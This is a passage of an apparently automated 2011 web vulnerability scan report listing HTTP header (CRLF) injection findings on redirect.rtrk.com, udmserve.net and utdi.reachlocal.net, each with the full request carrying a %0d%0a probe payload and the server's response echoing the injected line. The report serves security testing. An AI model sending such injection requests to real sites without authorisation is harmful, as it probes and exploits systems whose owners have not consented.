The value of the RL_qstr request parameter is copied into the Location response header. The payload d0f4f%0d%0a6e008c98e33 was submitted in the RL_qstr parameter. This caused a response containing an injected HTTP header.
Request
GET /redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=d0f4f%0d%0a6e008c98e33&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: http://utdi.reachlocal.com/coupon/?d0f4f
6e008c98e33
Vary: Accept-Encoding
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:40 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.reachlocal.com/coupon/?d0f4f
6e008
...[SNIP]...
|
1.6. http://redirect.rtrk.com/redirect [RL_rurl parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://redirect.rtrk.com |
| Path: |
/redirect |
Issue detail
The value of the RL_rurl request parameter is copied into the Location response header. The payload b10dd%0d%0a3788128dbfd was submitted in the RL_rurl parameter. This caused a response containing an injected HTTP header.
Request
GET /redirect?RL_rurl=b10dd%0d%0a3788128dbfd&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26rl_key%3De2e30c5686d91c3f4971163361e1b86a%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:37 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: b10dd
3788128dbfd?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Vary: Accept-Encoding
Content-Length: 571
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:29 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="b10dd
3788128dbfd?scid=2323693&cid=837045&
...[SNIP]...
|
1.7. http://udmserve.net/udm/img.fetch [dt cookie]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://udmserve.net |
| Path: |
/udm/img.fetch |
Issue detail
The value of the dt cookie is copied into the Set-Cookie response header. The payload 6ab88%0d%0a0adc77508cd was submitted in the dt cookie. This caused a response containing an injected HTTP header.
Request
GET /udm/img.fetch?sid=2900;tid=1;ev=1;dt=1; HTTP/1.1
Host: udmserve.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=4;sz=728x90;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: udm1=9173:1:63440343934:1:2900:0:0:63440343934:1:1|; dt=6ab88%0d%0a0adc77508cd; __qca=P0-679846959-1315331134624
|
Response
HTTP/1.1 200 OK
P3P: CP='NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT'
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT"
Set-Cookie: udm1=9173:1:63440344253:14:2900:0:0:63440344253:1:1|; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12:50:53 GMT
Set-Cookie: dt=6ab88
0adc77508cd; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12: 50:53 GMT
Expires: Mon, 05 Sep 2011 12:50:53 GMT
Date: Tue, 06 Sep 2011 12:50:53 GMT
Content-Type: text/html; charset=ISO-8859-1
Server: lighttpd/1.4.28
Content-Length: 1337
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<
...[SNIP]...
|
1.8. http://utdi.reachlocal.net/images/Bottom_facebook.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/Bottom_facebook.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 2516f%0d%0a0b50936584 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2516f%0d%0a0b50936584/Bottom_facebook.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:20 GMT
Server: Apache
Location: http://utdi.com/2516f
0b50936584/Bottom_facebook.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:13 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/2516f
0b50936584/Bottom_facebo
...[SNIP]...
|
1.9. http://utdi.reachlocal.net/images/Rsidepanel_CSportalHead.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/Rsidepanel_CSportalHead.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 54340%0d%0a57bb639a64e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /54340%0d%0a57bb639a64e/Rsidepanel_CSportalHead.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:50 GMT
Server: Apache
Location: http://utdi.com/54340
57bb639a64e/Rsidepanel_CSportalHead.jpg
Vary: Accept-Encoding
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:42 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/54340
57bb639a64e/Rsidepanel_C
...[SNIP]...
|
1.10. http://utdi.reachlocal.net/images/Rsidepanel_ID-contact.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/Rsidepanel_ID-contact.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload ae4cb%0d%0a0096e3364fc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /imagesae4cb%0d%0a0096e3364fc/Rsidepanel_ID-contact.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/imagesae4cb
0096e3364fc/Rsidepanel_ID-contact.jpg
Vary: Accept-Encoding
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/imagesae4cb
0096e3364fc/Rsidep
...[SNIP]...
|
1.11. http://utdi.reachlocal.net/images/Rsidepanel_ID-pr.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/Rsidepanel_ID-pr.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 3eb55%0d%0aefef98aca08 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /images3eb55%0d%0aefef98aca08/Rsidepanel_ID-pr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/images3eb55
efef98aca08/Rsidepanel_ID-pr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:54 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/images3eb55
efef98aca08/Rsidep
...[SNIP]...
|
1.12. http://utdi.reachlocal.net/images/Rsidepanel_ID-specials.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/Rsidepanel_ID-specials.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload cbce7%0d%0a95d968751a4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /cbce7%0d%0a95d968751a4/Rsidepanel_ID-specials.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:23 GMT
Server: Apache
Location: http://utdi.com/cbce7
95d968751a4/Rsidepanel_ID-specials.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:15 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/cbce7
95d968751a4/Rsidepanel_I
...[SNIP]...
|
1.13. http://utdi.reachlocal.net/images/Rsidepanel_UTDI-G.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/Rsidepanel_UTDI-G.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload ca126%0d%0a0d553889d45 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /ca126%0d%0a0d553889d45/Rsidepanel_UTDI-G.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/ca126
0d553889d45/Rsidepanel_UTDI-G.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/ca126
0d553889d45/Rsidepanel_U
...[SNIP]...
|
1.14. http://utdi.reachlocal.net/images/Rsidepanel_UTDiStore.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/Rsidepanel_UTDiStore.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 36ce5%0d%0aa169a199146 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /36ce5%0d%0aa169a199146/Rsidepanel_UTDiStore.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:23 GMT
Server: Apache
Location: http://utdi.com/36ce5
a169a199146/Rsidepanel_UTDiStore.jpg
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:15 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/36ce5
a169a199146/Rsidepanel_U
...[SNIP]...
|
1.15. http://utdi.reachlocal.net/images/Rsidepanel_btm.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/Rsidepanel_btm.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 8ea78%0d%0a6eb580edc8f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /8ea78%0d%0a6eb580edc8f/Rsidepanel_btm.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:28 GMT
Server: Apache
Location: http://utdi.com/8ea78
6eb580edc8f/Rsidepanel_btm.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:21 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/8ea78
6eb580edc8f/Rsidepanel_b
...[SNIP]...
|
1.16. http://utdi.reachlocal.net/images/Rsidepanel_mid-specials.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/Rsidepanel_mid-specials.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload fa623%0d%0a91d1427d552 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /fa623%0d%0a91d1427d552/Rsidepanel_mid-specials.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/fa623
91d1427d552/Rsidepanel_mid-specials.jpg
Vary: Accept-Encoding
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:54 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/fa623
91d1427d552/Rsidepanel_m
...[SNIP]...
|
1.17. http://utdi.reachlocal.net/images/Rsidepanel_mid.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/Rsidepanel_mid.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 7cffb%0d%0ae67eb0e78d0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7cffb%0d%0ae67eb0e78d0/Rsidepanel_mid.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:23 GMT
Server: Apache
Location: http://utdi.com/7cffb
e67eb0e78d0/Rsidepanel_mid.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:15 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/7cffb
e67eb0e78d0/Rsidepanel_m
...[SNIP]...
|
1.18. http://utdi.reachlocal.net/images/back-front.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/back-front.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 3d3b2%0d%0a658a9609ca0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3d3b2%0d%0a658a9609ca0/back-front.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
